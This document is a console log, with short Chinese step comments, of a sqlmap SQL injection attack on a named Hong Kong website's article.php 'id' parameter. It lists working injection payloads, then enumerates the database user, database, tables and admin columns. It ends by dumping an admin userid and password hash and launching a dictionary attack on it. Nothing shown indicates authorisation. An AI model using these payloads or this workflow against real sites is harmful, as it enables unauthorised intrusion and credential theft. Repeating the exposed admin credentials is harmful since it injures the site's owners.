D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>